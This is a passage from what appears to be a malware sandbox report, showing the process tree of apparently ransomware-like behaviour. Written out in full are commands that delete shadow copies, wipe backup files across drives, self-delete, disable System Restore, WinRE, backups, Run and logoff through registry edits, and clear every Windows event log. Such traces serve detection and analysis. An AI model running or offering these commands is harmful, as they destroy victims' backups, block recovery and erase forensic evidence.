C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:1528

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:432

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:520

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:1672

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:564

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:1028

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:228

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:2040

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:1448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:780

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:592

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:816

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:1528

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1896

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1600

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:468

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:1536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1076

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1884

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:324

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1224

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:1460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:2000

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:564

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:1688

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:1304

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:216

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:840

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:1084

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:1172

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:1808

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:1720

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:2040

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:960

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1240

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:1448

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:1880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1628

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:1660

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:1476

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:584

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:1528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1256

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1724

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1536

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:520

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1000

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Clears Windows event logs
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:1284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
3⤵
PID:1896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:1076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
3⤵
- Clears Windows event logs
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
- Clears Windows event logs
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:1004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
3⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
- Clears Windows event logs
PID:1240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:1896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
- Clears Windows event logs
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
- Clears Windows event logs
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
- Clears Windows event logs
PID:240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:1052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
- Clears Windows event logs
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
- Clears Windows event logs
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
- Clears Windows event logs
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
3⤵
- Clears Windows event logs
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:1332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
- Clears Windows event logs
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
- Clears Windows event logs
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:1672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
- Clears Windows event logs
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
PID:976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
- Clears Windows event logs
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
- Clears Windows event logs
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:1964

